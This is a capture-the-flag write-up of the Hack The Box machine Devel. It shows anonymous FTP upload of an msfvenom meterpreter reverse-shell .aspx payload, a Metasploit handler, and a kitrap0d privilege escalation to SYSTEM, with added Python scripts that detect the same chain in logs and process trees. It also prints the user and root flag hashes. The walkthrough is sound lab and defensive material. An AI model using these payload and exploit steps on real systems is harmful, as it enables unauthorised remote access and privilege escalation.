__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com


[HTB] Devel

Today we are going to hack the HTB machine called Devel.
  • Enumeration
    To start, we run nmap to see which ports are open.
    sml@Cassandra:~$ nmap -A -p- 10.10.10.5
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 12:35 CEST
    Nmap scan report for 10.10.10.5
    Host is up (0.037s latency).
    Not shown: 65533 filtered ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     Microsoft ftpd
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | 03-18-17  02:06AM       <DIR>          aspnet_client
    | 04-05-20  09:33PM                 2854 go.aspx
    | 03-17-17  05:37PM                  689 iisstart.htm
    |_03-17-17  05:37PM               184946 welcome.png
    | ftp-syst:
    |_  SYST: Windows_NT
    80/tcp open  http    Microsoft IIS httpd 7.5
    | http-methods:
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/7.5
    |_http-title: IIS7
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 136.61 seconds
    We can log in to the FTP server anonymously, and its contents are exactly what the IIS web server is serving, so we use msfvenom to generate a meterpreter/reverse_tcp payload as an .aspx file and upload it over FTP.
  • Exploitation
    sml@Cassandra:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=6666 -f aspx -o go.aspx
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 341 bytes
    Final size of aspx file: 2818 bytes
    Saved as: go.aspx
    We upload our .aspx to the FTP server.
    sml@Cassandra:~$ ftp 10.10.10.5
    Connected to 10.10.10.5.
    220 Microsoft FTP Service
    Name (10.10.10.5:sml): anonymous
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 User logged in.
    Remote system type is Windows_NT.
    ftp> put go.aspx
    local: go.aspx remote: go.aspx
    200 PORT command successful.
    125 Data connection already open; Transfer starting.
    226 Transfer complete.
    2854 bytes sent in 0.00 secs (18.5156 MB/s)
    ftp>
    We set up the handler on our machine and leave it listening.
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost 10.10.14.19
    lhost => 10.10.14.19
    msf5 exploit(multi/handler) > set lport 6666
    lport => 6666
    msf5 exploit(multi/handler) > exploit

    [*] Started reverse TCP handler on 10.10.14.19:6666
    We visit http://10.10.10.5/go.aspx to get the shell.
    [*] Sending stage (180291 bytes) to 10.10.10.5
    [*] Meterpreter session 1 opened (10.10.14.19:6666 -> 10.10.10.5:49196) at 2020-04-02 12:38:29 +0200

    meterpreter > sysinfo
    Computer        : DEVEL
    OS              : Windows 7 (6.1 Build 7600).
    Architecture    : x86
    System Language : el_GR
    Domain          : HTB
    Logged On Users : 0
    Meterpreter     : x86/windows
    meterpreter > shell
    Process 1280 created.
    Channel 1 created.
    Microsoft Windows [Version 6.1.7600]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

    c:\windows\system32\inetsrv>whoami
    whoami
    iis apppool\web
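    The chain above (an anonymous FTP write into the directory IIS serves, followed by an HTTP request to the uploaded .aspx) leaves a trace in two logs the server already keeps. The Python below is an added detection example, not code from this write-up or from any tool it uses: it parses constructed Microsoft FTP Service and IIS W3C log excerpts (column names are read from each file's own "#Fields:" header; the sample field layout is an assumption) and correlates completed anonymous STOR commands for script files with the first HTTP request for the same file name.

```python
"""Correlate anonymous FTP uploads of server-side script files with a
later HTTP request for the same file on the IIS site that shares the
FTP root. The log excerpts are constructed samples; the W3C field names
follow the usual IIS / Microsoft FTP Service layout (an assumption) and
are taken from each file's '#Fields:' directive rather than hard-coded."""
from datetime import datetime, timedelta

# Extensions IIS hands to a script engine; an anonymous upload of one of
# these into the web root is the misconfiguration worth alerting on.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx", ".asax", ".config")

FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2020-04-02 10:37:12 10.10.14.19 - 10.10.10.5 21 USER anonymous 331 0 0 4f2a -
2020-04-02 10:37:12 10.10.14.19 anonymous 10.10.10.5 21 PASS *** 230 0 0 4f2a /
2020-04-02 10:37:20 10.10.14.19 anonymous 10.10.10.5 21 STOR go.aspx 226 0 0 4f2a /go.aspx
2020-04-02 10:37:25 10.10.14.19 anonymous 10.10.10.5 21 RETR welcome.png 226 0 0 4f2a /welcome.png
2020-04-02 11:02:03 10.10.14.33 anonymous 10.10.10.5 21 STOR notes.txt 226 0 0 9c10 /notes.txt
"""

HTTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2020-04-02 10:36:50 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.19 Mozilla/5.0 200 0 0 15
2020-04-02 10:38:29 10.10.10.5 GET /go.aspx - 80 - 10.10.14.19 Mozilla/5.0 200 0 0 340
2020-04-02 11:05:00 10.10.10.5 GET /notes.txt - 80 - 10.10.14.33 curl/7.68.0 200 0 0 2
"""


def parse_w3c(text):
    """Turn a W3C extended log into dicts keyed by the names in the most
    recent '#Fields:' directive, with a parsed 'ts' timestamp added."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def anonymous_script_uploads(ftp_records):
    """Completed STOR commands by the anonymous user whose target has a
    script extension. Each is a finding on its own: anonymous write
    access into a web root should not exist."""
    return [r for r in ftp_records
            if r["cs-method"] == "STOR"
            and r["cs-username"].lower() == "anonymous"
            and r["sc-status"].startswith("2")
            and r["cs-uri-stem"].lower().endswith(SCRIPT_EXTENSIONS)]


def correlate_with_http(uploads, http_records, window=timedelta(hours=24)):
    """For each upload, find the first HTTP request for the same file
    within `window` afterwards: that request is when the script ran."""
    alerts = []
    for up in uploads:
        name = up["cs-uri-stem"].rsplit("/", 1)[-1].lower()
        for h in http_records:
            hit = h["cs-uri-stem"].rsplit("/", 1)[-1].lower()
            if hit == name and up["ts"] <= h["ts"] <= up["ts"] + window:
                alerts.append({
                    "file": name,
                    "uploaded_by": up["c-ip"],
                    "uploaded_at": up["ts"],
                    "requested_by": h["c-ip"],
                    "requested_at": h["ts"],
                    "seconds_between": int((h["ts"] - up["ts"]).total_seconds()),
                })
                break
    return alerts


def run_detection(ftp_log=FTP_LOG, http_log=HTTP_LOG):
    """Full pipeline over two log texts; returns the list of alerts."""
    uploads = anonymous_script_uploads(parse_w3c(ftp_log))
    return correlate_with_http(uploads, parse_w3c(http_log))


if __name__ == "__main__":
    for alert in run_detection():
        print(alert)
```

    A match is the moment the uploaded file executed; the anonymous STOR of any script file is already worth a ticket by itself, and the lasting fix is configuration rather than logging: the anonymous FTP user must not have write permission into a site's physical path.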
  • Privilege Escalation
    Now that we have an open session, we use post/multi/recon/local_exploit_suggester to find an exploit that lets us elevate privileges.
    msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
    msf5 post(multi/recon/local_exploit_suggester) > set session 1
    session => 1
    msf5 post(multi/recon/local_exploit_suggester) > run

    [*] 10.10.10.5 - Collecting local exploits for x86/windows...
    [*] 10.10.10.5 - 30 exploit checks are being tried...
    [+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
    [+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
    [+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
    [+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
    [+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
    [+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
    [+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
    [+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
    [+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
    [+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
    [+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
    [*] Post module execution completed
    Of all the candidates, we pick ms10_015_kitrap0d. Note in the output that the module's LHOST was left at its default (192.168.1.148:4444), so no new session comes back; the exploit still ran inside notepad.exe (PID 620), so migrating the existing session into that process gives us SYSTEM.
    msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
    msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
    session => 1
    msf5 exploit(windows/local/ms10_015_kitrap0d) > run

    [*] Started reverse TCP handler on 192.168.1.148:4444
    [*] Launching notepad to host the exploit...
    [+] Process 620 launched.
    [*] Reflectively injecting the exploit DLL into 620...
    [*] Injecting exploit into 620 ...
    [*] Exploit injected. Injecting payload into 620...
    [*] Payload injected. Executing exploit...
    [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
    [*] Exploit completed, but no session was created.
    msf5 exploit(windows/local/ms10_015_kitrap0d) > sessions -i 1
    [*] Starting interaction with 1...

    meterpreter > ps

    Process List
    ============

     PID   PPID  Name                    Arch  Session  User              Path
     ---   ----  ----                    ----  -------  ----              ----
     0     0     [System Process]
     4     0     System
     264   4     smss.exe
     324   488   dllhost.exe
     344   336   csrss.exe
     384   336   wininit.exe
     396   376   csrss.exe
     452   376   winlogon.exe
     488   384   services.exe
     496   384   lsass.exe
     504   384   lsm.exe
     608   488   svchost.exe
     620   3532  notepad.exe             x86   0                          C:\Windows\system32\notepad.exe
     672   488   svchost.exe
     724   488   svchost.exe
     796   452   LogonUI.exe
     832   488   svchost.exe
     888   488   svchost.exe
     1000  488   svchost.exe
     1092  488   svchost.exe
     1180  488   spoolsv.exe
     1216  488   svchost.exe
     1316  488   svchost.exe
     1384  488   svchost.exe
     1424  488   svchost.exe
     1512  488   VGAuthService.exe
     1520  488   msdtc.exe
     1540  488   vmtoolsd.exe
     1568  488   svchost.exe
     2020  608   WmiPrvSE.exe
     2084  608   WmiPrvSE.exe
     2780  488   sppsvc.exe
     2812  488   svchost.exe
     2892  488   SearchIndexer.exe
     3044  2892  SearchProtocolHost.exe
     3316  488   WmiApSrv.exe
     3532  1568  w3wp.exe                x86   0        IIS APPPOOL\Web   c:\windows\system32\inetsrv\w3wp.exe

    meterpreter > migrate 620
    [*] Migrating from 3532 to 620...
    [*] Migration completed successfully.
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
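    The ps listing above shows the whole escalation in one snapshot: notepad.exe (PID 620) is a child of w3wp.exe (PID 3532, running as IIS APPPOOL\Web) and, once the exploit has run, holds a SYSTEM token. The Python below is an added detection example, not code from this write-up or from Metasploit: it walks a constructed process snapshot with the same fields as that table (pid, ppid, image name, user) and flags unexpected children of the IIS worker process as well as any descendant running as SYSTEM beneath an app-pool worker. The set of children w3wp.exe is allowed to spawn is an assumption to tune per server.

```python
"""Flag suspicious descendants of the IIS worker process in a process
snapshot (pid, ppid, image, user), the kind of listing that
Get-CimInstance Win32_Process or an EDR process tree provides. The
snapshot is constructed to mirror the write-up: an app-pool w3wp.exe
whose notepad.exe child has ended up running as SYSTEM."""
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid name user")

# Children a web worker has a legitimate reason to start (ASP.NET page
# compilation and its console host). Assumed baseline; tune per server.
EXPECTED_W3WP_CHILDREN = {"csc.exe", "vbc.exe", "cvtres.exe", "conhost.exe"}
HIGH_PRIV_USERS = {"nt authority\\system"}

# Constructed sample snapshot (PIDs chosen to match the write-up's table).
SNAPSHOT = [
    Proc(4, 0, "System", "NT AUTHORITY\\SYSTEM"),
    Proc(488, 384, "services.exe", "NT AUTHORITY\\SYSTEM"),
    Proc(1568, 488, "svchost.exe", "NT AUTHORITY\\SYSTEM"),    # W3SVC service host
    Proc(3532, 1568, "w3wp.exe", "IIS APPPOOL\\Web"),
    Proc(5012, 3532, "csc.exe", "IIS APPPOOL\\Web"),           # benign page compile
    Proc(1280, 3532, "cmd.exe", "IIS APPPOOL\\Web"),           # shell spawned by web payload
    Proc(620, 3532, "notepad.exe", "NT AUTHORITY\\SYSTEM"),    # post-exploit: elevated
    Proc(2892, 488, "SearchIndexer.exe", "NT AUTHORITY\\SYSTEM"),
    Proc(3044, 2892, "SearchProtocolHost.exe", "NT AUTHORITY\\SYSTEM"),
]


def ancestors(snapshot, pid):
    """Walk ppid links upward from `pid`; stops on a missing or cyclic link
    (PIDs are reused, so a stale ppid must not loop forever)."""
    by_pid = {p.pid: p for p in snapshot}
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur and cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        chain.append(cur)
    return chain


def find_suspicious(snapshot):
    """Two checks per process:
    1. direct child of w3wp.exe whose image is not one IIS normally starts;
    2. any descendant of w3wp.exe running as SYSTEM while that worker
       itself runs as an app-pool identity (a token that should never
       appear below a low-privilege worker)."""
    by_pid = {p.pid: p for p in snapshot}
    findings = []
    for p in snapshot:
        reasons = []
        parent = by_pid.get(p.ppid)
        if (parent and parent.name.lower() == "w3wp.exe"
                and p.name.lower() not in EXPECTED_W3WP_CHILDREN):
            reasons.append("unexpected child of w3wp.exe (%s)" % parent.user)
        workers = [a for a in ancestors(snapshot, p.pid) if a.name.lower() == "w3wp.exe"]
        if (workers and p.user.lower() in HIGH_PRIV_USERS
                and workers[0].user.lower() not in HIGH_PRIV_USERS):
            reasons.append("runs as %s beneath app-pool worker pid %d" % (p.user, workers[0].pid))
        if reasons:
            findings.append({"pid": p.pid, "name": p.name, "user": p.user, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SNAPSHOT):
        print(f["pid"], f["name"], f["user"], "; ".join(f["reasons"]))
```

    The lasting fix is patching (MS10-015 and the other missing updates the suggester listed), but the tree check catches the pattern whichever kernel bug produced it, and a baseline of what each app pool normally spawns is cheap to keep.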
  • user.txt
    c:\Users>cd babis

    c:\Users\babis>dir
     Volume in drive C has no label.
     Volume Serial Number is 8620-71F1

     Directory of c:\Users\babis

    17/03/2017  05:17    <DIR>          .
    17/03/2017  05:17    <DIR>          ..
    17/03/2017  05:17    <DIR>          Contacts
    18/03/2017  02:14    <DIR>          Desktop
    17/03/2017  05:17    <DIR>          Documents
    17/03/2017  05:17    <DIR>          Downloads
    17/03/2017  05:17    <DIR>          Favorites
    17/03/2017  05:17    <DIR>          Links
    17/03/2017  05:17    <DIR>          Music
    17/03/2017  05:17    <DIR>          Pictures
    17/03/2017  05:17    <DIR>          Saved Games
    17/03/2017  05:17    <DIR>          Searches
    17/03/2017  05:17    <DIR>          Videos
                   0 File(s)              0 bytes
                  13 Dir(s)  24.383.025.152 bytes free

    c:\Users\babis>cd Desktop

    c:\Users\babis\Desktop>dir
     Volume in drive C has no label.
     Volume Serial Number is 8620-71F1

     Directory of c:\Users\babis\Desktop

    18/03/2017  02:14    <DIR>          .
    18/03/2017  02:14    <DIR>          ..
    18/03/2017  02:18                32 user.txt.txt
                   1 File(s)             32 bytes
                   2 Dir(s)  24.383.025.152 bytes free

    c:\Users\babis\Desktop>type user.txt.txt
    9ecdd6a3aedf24b41562fea70f4cb3e8
  • root.txt
    c:\Users>cd administrator

    c:\Users\Administrator>dir
     Volume in drive C has no label.
     Volume Serial Number is 8620-71F1

     Directory of c:\Users\Administrator

    18/03/2017  02:16    <DIR>          .
    18/03/2017  02:16    <DIR>          ..
    18/03/2017  02:16    <DIR>          Contacts
    18/03/2017  02:17    <DIR>          Desktop
    18/03/2017  02:16    <DIR>          Documents
    18/03/2017  02:16    <DIR>          Downloads
    18/03/2017  02:16    <DIR>          Favorites
    18/03/2017  02:16    <DIR>          Links
    18/03/2017  02:16    <DIR>          Music
    18/03/2017  02:16    <DIR>          Pictures
    18/03/2017  02:16    <DIR>          Saved Games
    18/03/2017  02:16    <DIR>          Searches
    18/03/2017  02:16    <DIR>          Videos
                   0 File(s)              0 bytes
                  13 Dir(s)  24.383.737.856 bytes free

    c:\Users\Administrator>cd Desktop

    c:\Users\Administrator\Desktop>dir
     Volume in drive C has no label.
     Volume Serial Number is 8620-71F1

     Directory of c:\Users\Administrator\Desktop

    18/03/2017  02:17    <DIR>          .
    18/03/2017  02:17    <DIR>          ..
    18/03/2017  02:17                32 root.txt.txt
                   1 File(s)             32 bytes
                   2 Dir(s)  24.383.737.856 bytes free

    c:\Users\Administrator\Desktop>type root.txt.txt
    e621a0b5041708797c4fc4728bc72b4b
  • End
    And with that we have both the "user" flag and the "root" flag.